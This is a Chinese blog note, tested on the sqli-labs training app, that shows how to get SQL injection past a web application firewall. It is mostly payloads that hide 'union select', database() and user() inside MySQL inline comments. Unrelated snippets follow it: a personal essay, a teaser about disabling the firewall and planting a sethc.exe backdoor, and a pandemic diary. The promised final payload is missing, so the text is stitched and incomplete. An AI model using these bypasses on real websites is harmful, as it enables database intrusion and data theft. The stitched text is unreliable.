版本號為3.5.12048,規則也更新到最新
我們用sqli-lab來進行測試,主要是方便,剛好有環境,改一下**就可以用了
我們可以看到初始語句如下:
select * from users where id='1' limit 0,1
測試單引號'和雙引號"是不攔截的
經過測試,諸如?id=1' and 1=1 --+的語句均會被攔截,
但是可以用如下語句進行繞過
?id=1' and 1=1 --+
?id=1'/*!*/and/*!*/1=1/*!*/--+?id=-1'/*!*/union/*!*/select/*!*/1,2,3/*!*/--+
會被攔截
可以用下面語句進行繞過:
?id=-1'/*!*/union/*!888888cas*//*!*//*!888888cas*/select/*!*/1,2,3/*!*/--+
在前後加任意的取消注釋可以繞過
database()user()函式同理
databse()
替換成:/*!database*//*!()*/
user()
替換成:/*!user*//*!()*/
最後語句如下:
小弟不才,思路整理,也作為自身的筆記記錄,有更好的想法可多多指點。
2023年初,新征程,滿懷期待,再出發
這注定是一篇長文,謹以此文祭奠已經逝去的乙個多月的美好時光!在此分享,願與諸君共勉 全文4097字,閱讀大概需要10分鐘 時間猶如白駒過隙一般,溜得飛快,定睛一看,部落格又乙個多月不見更新了。有粉絲或許會問,這乙個多月我去忙啥了。毫不掩飾地告訴大家,這乙個多月的時間裡,我談了一次比較失敗的戀愛,對方...
提權繞過安全狗加賬戶的種種思路。
注 個人學習總結心得。提權時候拿到system許可權後,安全狗 就如同渣渣,不是麼?打狗棍法一 system許可權下直接執行k狗工具,k掉安全狗 的防禦,打狗棍法二 上傳shift後門 有可能被攔截 直接複製 copy c sethc.exe c windows system32 sethc.exe...
2023年初冠狀病毒大事記隨筆
這次新型冠狀病毒裹挾著春運大潮,來勢洶洶,觸不及防。在家修身養性的日子,外界似乎又發生很多事情,籃球巨星科比隕落,澳洲大火連綿不絕,美國甲流死亡數千人等等,感概萬千。以前覺得這些事很遙遠,現在許多事都在身邊發生,漸漸感覺到世界有時候的冷漠。疫情地圖上的數字逐日增加,每天都有新的恐慌出現,專家說口罩能...